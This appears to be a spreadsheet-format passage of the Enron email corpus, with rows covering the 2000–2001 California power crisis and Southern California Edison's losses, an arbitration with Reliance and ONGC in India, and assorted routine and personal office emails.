                  the company's regulated utility unit, Southern California_x000D_
Edison, won't be able to_x000D_
                  recover more than $3 billion in losses related to power_x000D_
purchases and continue serving_x000D_
                  its retail customers unless the state's deregulated market_x000D_
structure is scrapped._x000D_
_x000D_
                       In a move tantamount to a call for reregulation,_x000D_
Edison will propose to break ground_x000D_
                  on new power plants within 90 days and re-enter the_x000D_
power-generation business_x000D_
                  Southern California Edison was required to exit under the_x000D_
state's landmark 1996_x000D_
                  deregulation law, the sources said._x000D_
_x000D_
                       Edison plans to follow the announcement by filing a_x000D_
request with state regulators to_x000D_
                  increase retail electricity rates by as much as 20%, the_x000D_
sources said, even though_x000D_
                  regulators rejected Edison's request for a rate increase_x000D_
of 10% last week._x000D_
_x000D_
                       The utility has lined up the support of some state_x000D_
lawmakers for the broader_x000D_
                  proposal, which would require action by the state_x000D_
legislature, the sources said._x000D_
_x000D_
                       Southern California Edison, with 4.2 million_x000D_
customers, is one of the country's largest_x000D_
                  electric utilities. Edison was the first of the state's_x000D_
utilities to sign on to the deregulation_x000D_
                  effort and, as it says on its Web site, "played a central_x000D_
role in the restructuring of the_x000D_
                  electric industry in California."_x000D_
_x000D_
                       Among the concessions won by utilities in 1996 is the_x000D_
rate freeze, which they_x000D_
                  demanded to help them recover costs related to_x000D_
deregulation but which is now_x000D_
                  producing huge losses._x000D_
_x000D_
                       Edison's current losses stem from an imbalance_x000D_
between the soaring prices it must_x000D_
                  pay to purchase power on the wholesale markets and the_x000D_
fixed rate at which it can sell_x000D_
                  power to its customers._x000D_
_x000D_
                       About half of those losses are offset the utility's_x000D_
own power sales revenues, which_x000D_
                  are accounted for separately and used to pay down_x000D_
deregulation-related debt. Rising_x000D_
                  power costs have produced a surplus in that account._x000D_
Edison wouldn't reveal the_x000D_
                  current size of the surplus, but said previously that the_x000D_
California Power Exchange paid_x000D_
                  the utility $1.3 billion over its generating costs for_x000D_
power through the end of September,_x000D_
                  at a time when its power-purchase losses were $2.4_x000D_
billion._x000D_
_x000D_
                       Power-Purchase Losses Mounting_x000D_
_x000D_
_x000D_
_x000D_
                       The net losses continue to mount. California's_x000D_
wholesale power prices hovered at_x000D_
                  record levels all summer and spiked even higher in the_x000D_
past two weeks, as colder_x000D_
                  weather arrived in the Northwest at a time when much of_x000D_
California's power supply was_x000D_
                  down for maintenance._x000D_
_x000D_
                       The price of power for delivery Wednesday in_x000D_
California hit an average of $1,182 a_x000D_
                  megawatt-hour Tuesday, up from $250 a megawatt-hour a week_x000D_
ago, the result of high_x000D_
                  demand and a decision by California's wholesale market_x000D_
operator to lift its cap on prices._x000D_
_x000D_
                       The rate Southern California Edison can charge its_x000D_
retail customers, however, is fixed_x000D_
                  at $66/MWh._x000D_
_x000D_
                       Last week, Merrill Lynch &amp; Co. (MER) downgraded its_x000D_
ratings for Edison_x000D_
                  International and PG&amp;E Corp. (PCG), the parent of_x000D_
California's other major utility, Pacific_x000D_
                  Gas &amp; Electric, to neutral, saying the utilities may be_x000D_
forced to file for bankruptcy if the_x000D_
                  state doesn't allow them to raise their retail rates._x000D_
_x000D_
                       A Morgan Stanley Dean Witter (MDW) analyst drew the_x000D_
same conclusion Monday,_x000D_
                  also cutting his rating to neutral._x000D_
_x000D_
                       Edison to this point has kept its power-purchase_x000D_
losses off its earnings statement, in_x000D_
                  hopes that a political or regulatory solution will allow_x000D_
them to be collected later._x000D_
_x000D_
                       The California Public Utilities Commission put the_x000D_
hope of such a solution further out_x000D_
                  of reach last week, however, when it ruled against rate_x000D_
increases sought by Edison and_x000D_
                  PG&amp;E._x000D_
_x000D_
                       Credit rating agency Fitch Inc. on Monday lowered its_x000D_
ratings for Edison_x000D_
                  International and Southern California Edison's senior_x000D_
unsecured debt to the A-minus_x000D_
                  level, citing "increased liquidity pressure" and_x000D_
uncertainty about the utilities' ability to_x000D_
                  recover the costs of their power purchases. The agency_x000D_
downgraded Edison_x000D_
                  International, the parent, because half its consolidated_x000D_
cash flow is provided by_x000D_
                  Southern California Edison._x000D_
_x000D_
                       Edison - which sources said plans to remain in the_x000D_
retail electricity business - said_x000D_
                  late last week that it has secured a $1 billion line of_x000D_
credit and expects to have enough_x000D_
                  cash on hand to continue to pay for wholesale electricity_x000D_
for the next several months._x000D_
_x000D_
                       California paid more than $1 billion for power last_x000D_
week, sources said. Some of that,_x000D_
                  however, was paid to Southern California Edison, which_x000D_
still generates about 2,800_x000D_
                  megawatts of power in the state._x000D_
_x000D_
                       Shares in Edison International have fallen 21% over_x000D_
the past three weeks. They_x000D_
                  closed Wednesday at $18.56, down $0.06._x000D_
_x000D_
                       -By Jason Leopold, Dow Jones Newswires; 323-658-3874;_x000D_
                  mailto:jason.leopold@dowjones.com(Mark Golden contributed_x000D_
to this article.)_x000D_
_x000D_
Katie Kaplan_x000D_
Manager of State Policy Affairs_x000D_
Independent Energy Producers Association_x000D_
(916) 448-9499_x000D_
_x000D_
-----Original Message-----_x000D_
From: Katie Kaplan [mailto:kaplan@iepa.com]_x000D_
Sent: Wednesday, December 13, 2000 10:50 AM_x000D_
To: William Hall; Trond Aschehoug; Tony Wetzel; Susan J Mara; Steve Ponder;_x000D_
Steve Iliff; Scott Noll; Roger Pelote; Rob Lamkin; Randy Hickok; Paula Soos;_x000D_
Marty McFadden; Lynn Lednicky; Kent Fickett; Ken Hoffman; Jonathan Weisgall;_x000D_
Joe Ronan; Joe Greco; Jim Willey; Jeff Dasovich; Jack Pigott; Hap Boyd; Greg_x000D_
Blue; Frank DeRosa; Eric Eisenman; Eileen Koch; Ed Tomeo; Duane Nelsen; Dean_x000D_
Gosselin; Dave Parquet; Curtis Kebler; Curt Hatton; Cody Carter; Carolyn_x000D_
Baker; Bob Escalante; Bill Woods; Bill Carlson; Kate Castillo; Pigott Jack;_x000D_
Tom Ross; Sue Mara; Stephanie-Newell; Richard Hyde; Paula Hall-Collins;_x000D_
Norton Kelli; McNally Ray; Marty Wilson; Kristin Vellandi; kent Palmerton;_x000D_
Katie Kaplan; Kassandra Gough; Karen Edson; Julee Malinowski-Ball; John_x000D_
Stout; Jeff Dasovich; Jean Munoz; Jan Smutny-Jones; Bob Weisenmiller; B_x000D_
Brown Andy; Andy Brown; Douglas Kerner_x000D_
Cc: Douglas Kerner; Julee Malinowski-Ball; Karen Edson; Andy Brown; B Brown_x000D_
Andy_x000D_
Subject: FYI-Edison wants back in the generation business_x000D_
_x000D_
_x000D_
_x000D_
Edison Mission Energy Power Project Starts Construction After Expedited_x000D_
Approval By California Energy Commission_x000D_
_x000D_
 Monday December 11 6:39pm_x000D_
 Source: Dow Jones_x000D_
_x000D_
 Operation Targeted for August_x000D_
_x000D_
 IRVINE, Calif., Dec. 11 /PRNewswire/ -- Edison Mission Energy (EME), an_x000D_
Edison International company (NYSE: EIX), started construction of its new_x000D_
 Sunrise power plant on Thursday, December 7, having received expedited_x000D_
approval from the California Energy Commission (CEC) to proceed. The_x000D_
 power generation facility will be located in Kern County, California, and_x000D_
will bring both short- and long-term generation capacity to the state, which_x000D_
is in_x000D_
 dire need of new power generation._x000D_
_x000D_
 "From the onset of the California power crisis, we have sought to find_x000D_
means to bring new power to the California market," said John E. Bryson,_x000D_
 chairman and CEO of Edison International. "This CEC approval will help_x000D_
ensure that this critical new project will be able to provide a significant_x000D_
amount_x000D_
 of new peaking power to the state as soon as next August. Our thanks and_x000D_
appreciation go to the California Energy Commission, and the_x000D_
 environmental and regulatory agencies for their swift consideration of this_x000D_
important project."_x000D_
_x000D_
 "This power has been offered by contract to the state so that the pricing_x000D_
for it does not depend on California's broken deregulated power market,"_x000D_
said_x000D_
 Alan J. Fohrer, president and CEO of EME. "Alternatively, EME will seek to_x000D_
enter into a long-term, cost-based contract with either Pacific Gas &amp;_x000D_
 Electric Company or San Diego Gas &amp; Electric Company to further ensure that_x000D_
California's consumers reap the benefit of this additional power_x000D_
 resource," Fohrer said._x000D_
_x000D_
 The Sunrise Power Project will be completed in two phases. Phase 1 will_x000D_
consist of a 320-megawatt (MW), simple-cycle peaking facility scheduled to_x000D_
 be in service during the summer 2001. Phase 2 will convert the peaking_x000D_
facility to a 560-MW, combined-cycle operation with an in-service date of_x000D_
 summer 2003. The project will meet or exceed all pertinent environmental_x000D_
and safety standards._x000D_
_x000D_
 Final regulatory approvals have been received for Phase I of the project_x000D_
only._x000D_
_x000D_
 EME will be seeking expedited permitting approval for the Phase II_x000D_
expansion in line with the fast-track approval process recently enacted by_x000D_
the_x000D_
 California legislature._x000D_
_x000D_
 EME has also negotiated an agreement with the labor unions for an adequate_x000D_
supply of highly skilled labor in order to achieve an accelerated_x000D_
 construction schedule. The accelerated schedule is aimed at providing this_x000D_
additional power to California by next summer._x000D_
_x000D_
 Edison Mission Energy specializes in the development, acquisition,_x000D_
construction management and operation of global power production facilities._x000D_
As_x000D_
 one of the world's leading global power producers, Edison Mission Energy_x000D_
owns nearly 23,000 megawatts of generating capacity, including interests in_x000D_
 75 projects currently under construction or operating in Australia,_x000D_
Indonesia, Italy, New Zealand, Puerto Rico, Spain, Thailand, Turkey, the_x000D_
United_x000D_
 Kingdom and the United States._x000D_
_x000D_
 Based in Rosemead, Calif., Edison International is a premier international_x000D_
electric power generator, distributor and structured finance provider. With_x000D_
a_x000D_
 portfolio of approximately 28,000 megawatts, Edison International is an_x000D_
industry leader in privatized, deregulated and incentive-regulated markets_x000D_
and_x000D_
 power generation. It is the parent company of Edison Mission Energy,_x000D_
Southern California Edison, Edison Capita, Edison Enterprises and Edison_x000D_
 O&amp;M Services._x000D_
_x000D_
 /CONTACT: Kevin Kelley of Edison Mission Energy, 626-302-1033, Fax,_x000D_
626-302-7827/ 21:35 EST_x000D_
_x000D_
Katie Kaplan_x000D_
Manager of State Policy Affairs_x000D_
Independent Energy Producers Association_x000D_
(916) 448-9499_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 11:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Bullets re California in the NL?</t>
  </si>
  <si>
    <t xml:space="preserve">I would add to what Teun says below a good lesson from California for the _x000D_
Dutch: Disconnect the functioning of the retail and wholesale markets at your _x000D_
peril. If bad regulatory/ political  intervention gets in the way of _x000D_
participation by new and old players in both on a level playing field, _x000D_
fingers will get burnt. In the Netherlands the incumbent generators and _x000D_
vertically integrated distributors have been given unfair advantages in a _x000D_
non-transparent manner in the wholesale market, whilst enjoying more or less _x000D_
guaranteed prices in the retail market. New entrants/ importers got squeezed _x000D_
and most consumers have not yet enjoyed the full benefits of liberalisation. _x000D_
Incidentally, in both California and the Netherlands there was excessive _x000D_
political trumpeting of the benefits and of the enlightenment of policymakers _x000D_
in advance, followed by a mess in practice. _x000D_
_x000D_
---------------------- Forwarded by Peter Styles/LON/ECT on 08/06/2001 18:50 _x000D_
---------------------------_x000D_
From: Teun van Biert/Enron@EUEnronXGate on 06/06/2001 10:05_x000D_
To: Nailia Dindarova/LON/ECT@ECT, Peter Styles/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Bullets re California in the NL?_x000D_
_x000D_
Email below was sent to both of you on Monday evening. _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Van Biert, Teun  _x000D_
Sent: maandag 4 juni 2001 21:08_x000D_
To: peter.styles@enron.com; nailia.dindarova@enron.com_x000D_
Subject: Bullets re California in the NL?_x000D_
_x000D_
Peter, Nailia,_x000D_
_x000D_
Today Dutch bank holiday, heard nevertheless your voicemail, please find _x000D_
below initial thoughts in bullet format:_x000D_
_x000D_
_x000D_
_x000D_
Why California cannot happen in the Dutch market:_x000D_
_x000D_
? Plenty installed capacity available _x000D_
Available import capacity about 30% of total demand_x000D_
Price cap for distco's based on real quarterly purchase portfolio and _x000D_
industry average index _x000D_
_x000D_
_x000D_
Why California nevertheless -in the longer run- can happen:_x000D_
_x000D_
? CHP plants are closed down and large generators are shutting down plants_x000D_
Lack of grid system transparency with regards to importcapacity, operational _x000D_
aspects of the grid, balancing market etc. Biased signals to the market.  _x000D_
Market structure with limited number of players therefore lack of _x000D_
competition. Prices do not reflect underlying market supply and demand ratio. _x000D_
Therefore new entrants are hesitating to add new assets to the market._x000D_
Environmental and spatial permits are time consuming processes. (e.g. _x000D_
National Government faces large resistance of local authorities against the _x000D_
siting of windmills). Governmental Policy aims at state of the art technology _x000D_
of new additions to the powerplantmix. Environmental Impact Report often _x000D_
necessary. _x000D_
_x000D_
_x000D_
Teun_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 07:17:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tiger Natural Gas</t>
  </si>
  <si>
    <t>Tom,_x000D_
Please do not sell anymore gas to Tiger. Sitara Deal# 1048759 originally from 9/19/2001 should no longer be extended. Please call if you have any questions._x000D_
_x000D_
_x000D_
-Darren</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 14:47:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wayne.vinson@enron.com'})</t>
  </si>
  <si>
    <t>FW: Donnie Vinson thanks you for your ALS donations!!!</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Vinson, Donald Wayne  _x000D_
Sent:	Tuesday, July 10, 2001 4:42 PM_x000D_
To:	Davidson, Debra_x000D_
Subject:	Donnie Vinson thanks you for your ALS donations!!!_x000D_
_x000D_
I would like to thank everyone that contributed to the Beach Bowl 2001 for ALS.  My grandmother passed away from this debilitating disease in 1986 and since then there has been only one small breakthrough in the treatment.  Hopefully with your donations and those of others we can make a difference for those suffering from ALS. It means a great deal to me that you were able to help out even though the event was so far away from Portland. Thank you again for your support and I miss everyone._x000D_
_x000D_
Donnie Vinson</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 10:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EBS Org Charts</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sherri Sera/Corp/Enron on 10/27/2000 _x000D_
05:03 PM ---------------------------_x000D_
_x000D_
_x000D_
Margaret Dennison@ENRON COMMUNICATIONS_x000D_
10/27/2000 05:05 PM_x000D_
To: Sherri Sera/Corp/Enron@Enron, Dorothy Dalton/Enron Communications@Enron _x000D_
Communications, Marla Barnard/Enron Communications@Enron Communications_x000D_
cc:  _x000D_
_x000D_
Subject: EBS Org Charts_x000D_
_x000D_
Here is the Powerpoint file for EBS.  Let me know if we need to make any _x000D_
changes.  md_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 4 Dec 2001 08:33:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'norman.lee@enron.com'})</t>
  </si>
  <si>
    <t>FW: Perf Reports</t>
  </si>
  <si>
    <t xml:space="preserve">Do you think Min would be able to help?_x000D_
_x000D_
Stacey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Tuesday, December 04, 2001 9:23 AM_x000D_
To:	White, Stacey W.; Gossett, Jeffrey C._x000D_
Subject:	Perf Reports_x000D_
_x000D_
I'm anticipating a request for trader stats very shortly here. Problem is that we laid off my excel wiz ?. Any chance one of you would have an excel wiz sitting around that would like to get cranking on perf reports?_x000D_
Frank_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 05:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tony.jarrett@enron.com'})</t>
  </si>
  <si>
    <t>Re: Enron Investment Partners Company Incentive Plan -- Second_x000D_
 Draft of Plan Document and Form Award Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Tony, the lawyer's name is Gary Herrmanns at Orrick.  His number is _x000D_
415-773-5451.  Thanks for the message about Trey!  Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tony Jarrett@ENRON_x000D_
03/20/2000 01:17 PM_x000D_
To: Michelle Cash/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Enron Investment Partners Company Incentive Plan -- Second Draft _x000D_
of Plan Document and Form Award Agreement  _x000D_
_x000D_
Michelle:_x000D_
_x000D_
Will you please forward me the name and number of the attorney who suggested _x000D_
we try to structure payments under this plan in a manner that would result in _x000D_
capital gains treatment to participants?  Thanks._x000D_
_x000D_
Tony_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 Aug 2000 00:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Arbitration with Reliance and ONGC</t>
  </si>
  <si>
    <t xml:space="preserve">Are you aware of this?_x000D_
---------------------- Forwarded by Steven J Kean/HOU/EES on 08/01/2000 07:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Sanjay Bhatnagar@ENRON_DEVELOPMENT_x000D_
08/01/2000 12:23 AM_x000D_
To: Steven J Kean@EES_x000D_
cc:  _x000D_
Subject: Re: Arbitration with Reliance and ONGC_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sanjay Bhatnagar/ENRON_DEVELOPMENT on _x000D_
08/01/2000 12:23 AM ---------------------------_x000D_
_x000D_
Delivery Failure Report_x000D_
Your document:	Re: Arbitration with Reliance and ONGC_x000D_
was not delivered to:	steven kean_x000D_
because:	User steven kean not listed in public Name &amp; Address Book_x000D_
_x000D_
What should you do?_x000D_
You can resend the undeliverable document to the recipients listed above by _x000D_
choosing the Resend button or the Resend command on the Actions menu.  _x000D_
Once you have resent the document you may delete this Delivery Failure Report._x000D_
If resending the document is not successful you will receive a new failure _x000D_
report_x000D_
Unless you receive other Delivery Failure Reports, the document was _x000D_
successfully delivered to all other recipients._x000D_
_x000D_
_x000D_
EI-NINET01/ENRON_DEVELOPMENT, EI-NINET01/ENRON_DEVELOPMENT, _x000D_
EDC_NMAIL01/ENRON_DEVELOPMENT_x000D_
_x000D_
_________________________x000D_
_x000D_
_x000D_
To: Jeffrey Sherrick/Corp/Enron@ENRON_x000D_
cc: Joseph W Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rob Walls, steven _x000D_
kean, Wade Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jimmy _x000D_
Mogal/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
From: Sanjay Bhatnagar/ENRON_DEVELOPMENT_x000D_
Date: 08/01/2000 12:08:55 AM_x000D_
Subject: Re: Arbitration with Reliance and ONGC_x000D_
_x000D_
Jeff:_x000D_
_x000D_
This is all Ok after the fact but I would have expected that we would have _x000D_
discussed this before action was taken. _x000D_
_x000D_
For the record, I would not advise calling this an arbitration BUT mediation _x000D_
and I would work with senior government officials and politicians ahead of _x000D_
time to control the fall out that may come about especially since Parliament _x000D_
is in session right now._x000D_
_x000D_
I will advise our PR group to say nothing to the press but route all queries _x000D_
to you._x000D_
_x000D_
sanjay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeffrey Sherrick@ENRON_x000D_
07/31/2000 06:19 AM_x000D_
To: John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Larry _x000D_
Morse/Corp/Enron@Enron, Mike Stewart/Corp/Enron@ENRON, Sanjay _x000D_
Bhatnagar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Michael J _x000D_
Smalling/HOU/ECT@ECT, Stephen Wallace/Corp/Enron@ENRON, Wade _x000D_
Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rick Phillips/Corp/Enron@Enron_x000D_
cc: Rob Walls/NA/Enron@Enron, James Derrick/Corp/Enron@ENRON, Steven J _x000D_
Kean/HOU/EES@EES, Joseph W Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Pam _x000D_
Benson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Christina Grow/Corp/Enron@ENRON _x000D_
Subject: Arbitration with Reliance and ONGC_x000D_
_x000D_
I was in India last week meeting with partners and we all agreed that the _x000D_
best thing to do to move ahead regarding the old unrecovered cash calls _x000D_
("joint interest billings") was to file an arbitration proceeding and get an _x000D_
objective  third party to settle the issue.  As you know, Reliance and ONGC _x000D_
owe EOGIL approximately  $7.1 and $10.3 million, respectively (including _x000D_
interest on non-payment).  The arbitration notices reflected only the _x000D_
non-payment numbers which are $5.8 and $7.3 million for RIL and ONGC _x000D_
respectively.   We finalized the drafting and dated the notices on July 29th _x000D_
and we delivered the official notice during business hours Monday July 31, _x000D_
2000.  This was the final step in a very long effort to resolve this issue in _x000D_
other means, but as I noted to the OOC after the June meetings this was the _x000D_
only solution in the end.   While nobody likes to file arbitration, the good _x000D_
news is in the end all parties seen this as the only solution and as best as _x000D_
I can tell, at least internally ONGC and Reliance support this decision.  If _x000D_
the issue gets external, I don't know how any of the parties will respond.  _x000D_
Our goal is to keep it as low keyed as possible, but this is India and I _x000D_
would expect someone to try to make a big issue out of it._x000D_
_x000D_
I will be in contact with John Ambler today to discuss the details of the _x000D_
submittal and to prepare for any response to the media that may be _x000D_
necessary.  While both parties were expecting the notice, it may leak into _x000D_
the media over the next few days.  Please defer any questions or comments to _x000D_
either John Ambler, Larry Morse or myself regarding this issue.  Until John _x000D_
advises us otherwise, our comment will be as follows;_x000D_
_x000D_
" The parties (ONGC, Reliance and Enron Oil and Gas India Limited) have had a _x000D_
dispute on certain cost items and together we have agreed it is best for the _x000D_
joint venture to have this dispute resolved by an independent third party _x000D_
using the guidelines as set forth in the Joint Operating Agreement."_x000D_
_x000D_
Mike Smalling in our office will coordinate this matter with John Ambler and _x000D_
the appropriate staff.   I will be available to respond if necessary and my _x000D_
contact numbers are as follows;_x000D_
_x000D_
office-713-853-5934_x000D_
pager 888-493-1770_x000D_
cell 713-569-4713_x000D_
home 281-320-2198_x000D_
_x000D_
Larry, please make sure our office understands that only you are to comment _x000D_
on this and any other official E&amp;P business in India and Wade/Sanjay would _x000D_
you share this note with the appropriate people in your office so nobody is _x000D_
surprised if something comes up.  Mike Smalling, John and/or I will keep you _x000D_
informed of any  relevant events._x000D_
_x000D_
jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 00:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ibuyit.payables@enron.com'})</t>
  </si>
  <si>
    <t>Action Requested:  Invoice Requires Coding/Issue_x000D_
 Resolution/Approval 00110100057553</t>
  </si>
  <si>
    <t xml:space="preserve">Please do not reply to this e-mail._x000D_
_x000D_
You are receiving this message because an invoice requiring coding, issue _x000D_
resolution, or approval has been submitted to your iBuyit Payables in-box.  _x000D_
This requires your action through iBuyit Payables._x000D_
_x000D_
To launch iBuyit Payables, click on the link below:_x000D_
http://iBuyitPayables.enron.com_x000D_
_x000D_
Note:  Log into iBuyitPayables using the same Employee PID (P-Number) and _x000D_
Password you use to enter the eHRonline system and/or SAP._x000D_
_x000D_
First time iBuyit Payables user?  For training materials, click on the link _x000D_
below:_x000D_
http://sap.enron.com/sap_doclib/user/file_list.asp?cabinet_id=265_x000D_
_x000D_
Need help?_x000D_
Please contact the ISC Call Center at (713) 345-4727._x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 03:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: ISDA Documentation - AEGIS</t>
  </si>
  <si>
    <t>I have tried to call him directly but he was not available.</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 06:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to help, but I am in Kansas hunting Pheasant during the last _x000D_
week in December._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
18/12/2000 15:46_x000D_
To: Debbie R Brackett/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Ted _x000D_
Murphy/HOU/ECT@ECT, Bjorn Hagelmann/HOU/ECT@ECT, David Port/Market _x000D_
Risk/Corp/Enron@ENRON, Mark Tawney/HOU/ECT@ECT, Joseph Hrgovcic/HOU/ECT@ECT, _x000D_
Greg Whalley/HOU/ECT@ECT, Louise Kitchen/HOU/ECT@ECT_x000D_
cc: Molly Magee/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
I am asking Molly Magee, our HR rep,  to set up an interview for Iris Mack_x000D_
with, depending on your availability between Christmas and New Year._x000D_
_x000D_
 Iris was interviewed by a number of my associates for a position_x000D_
with the Research Group and my objective is to introduce her to a number_x000D_
of Enron  units that she may eventually support. I shall appreciate your _x000D_
comments._x000D_
_x000D_
Vince Kaminski_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 19 Nov 2000 12:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael_yevak@notes.teradyne.com'})</t>
  </si>
  <si>
    <t>frozenset({'racer91@aol.com'})</t>
  </si>
  <si>
    <t>Re: Bove</t>
  </si>
  <si>
    <t>I believe that it was Ricky Greene.  I also believe that the laundry_x000D_
detergent was also melted onto his clothes, and yes it was the first time_x000D_
that he did laundry.</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 02:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.baumbach@enron.com', 'michael.eiben@enron.com', 'brian.redmond@enron.com', 'anne.koehler@enron.com', 'tommy.yanowski@enron.com', 'james.coffey@enron.com', 'edward.terry@enron.com', 'barbara.gray@enron.com', 'sally.beck@enron.com', 'leslie.reeves@enron.com', 'jeffrey.gossett@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com', 'edward.gottlob@enron.com', 'thomas.martin@enron.com'})</t>
  </si>
  <si>
    <t>AEP-HPL transition issues</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a updated memo about transition issues._x000D_
_x000D_
This is not a all inclusive memo but a starting point._x000D_
_x000D_
Please sent comments to me and I will update and redistribute._x000D_
_x000D_
thanks_x000D_
_x000D_
bob_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 03:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Coming to Houston, soon</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Wilson,_x000D_
_x000D_
Yep, I'm still in Houston for the time being...I'll probably be here through _x000D_
March of next year when my current rotation ends.  Everything's going pretty _x000D_
well, work is still consisting of long hours but I think ultimately the hard _x000D_
work is going to pay off.  In fact, the whole London thing is looking pretty _x000D_
good right now.  There might be an opportunity for me to get into some _x000D_
structuring and originating roles over there which is much more along the _x000D_
lines of where I'd like to go (versus this whole trader support thing - great _x000D_
experience for the time being, but definitely not a permanent role).  Glad to _x000D_
hear things are still well with you.  Sounds like you're still the same old _x000D_
Wilson...working deals and hooking-up.  You'll have to let me know when _x000D_
you're going to be in town so we can get the gang together to go out.  It _x000D_
looks like Darren's going to be back in town for about 6 weeks or so coming _x000D_
up so hopefully we could all make a steak night reunion.  _x000D_
_x000D_
I've been going out quite a bit as well and have had a couple dates, but _x000D_
nothing really to speak of.  I was kind of on a rampage over the last month _x000D_
just messing with guys heads (flirting, getting them to buy me drinks, giving _x000D_
them my number and then completely ignoring them).  I think it was some need _x000D_
I had to treat your entire gender like shit.  I'm pretty much over it _x000D_
though.  It's not really in my nature to be like that, just a reactionary _x000D_
thing for having been treated like crap myself.  _x000D_
_x000D_
Keep in touch and let me know when you're going to be in town._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Wilson Kriegel@EES_x000D_
11/17/2000 02:26 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Coming to Houston, soon  _x000D_
_x000D_
you still in Houston or where are you and what are you up to&gt;_x000D_
I have not heard from you in quite a while._x000D_
_x000D_
So what have you been up to and how is Enron treating you. when are you going _x000D_
to London._x000D_
_x000D_
All is well here...well work is very stressful, but it's cool and i do love _x000D_
my job despite all the bitching i do._x000D_
It's just a lot of strss._x000D_
I've made some big move and actually won a big project over a VP._x000D_
You will be seing me soon in Houston. (can't tell you more)_x000D_
_x000D_
Anyway_x000D_
Partying like crazy..that's all I do..girls..girls...and more girls...i can't _x000D_
even remember all their names OUPS&gt;_x000D_
Still in love with Shannon, and no she is still not in my life and yes she is _x000D_
still in Houston...I hope life helps a little on this one._x000D_
Partying..like 4-5 times a week.._x000D_
But above all, working out like an animal. It's been really good and i'm _x000D_
starting to look like i did at Enron...a machine._x000D_
Running a lot and working out..._x000D_
_x000D_
So what is up with you?_x000D_
_x000D_
be in touch_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 11:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>l.a. but I'll kill it.  1 went 6-4 with two pushes.  up 400 makes a balance of 4130.</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 11:14:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dipak.agarwalla@enron.com'})</t>
  </si>
  <si>
    <t>FW: Palo alto historical usage consolidation</t>
  </si>
  <si>
    <t xml:space="preserve">How is the project coming along?  No rush, just wanted to check in._x000D_
_x000D_
Thanks,_x000D_
Mike_x000D_
 -----Original Message-----_x000D_
From: 	Grigsby, Mike  _x000D_
Sent:	Tuesday, September 25, 2001 2:55 PM_x000D_
To:	Agarwalla, Dipak_x000D_
Subject:	FW: Palo alto historical usage consolidation_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Tuesday, September 25, 2001 2:54 PM_x000D_
To:	Grigsby, Mike_x000D_
Subject:	Palo alto historical usage consolidation_x000D_
_x000D_
Mike,_x000D_
_x000D_
Attached are Palo Alto's historical loads, which have been verified with Palo Alto.  If you would like to see a different format, let me know._x000D_
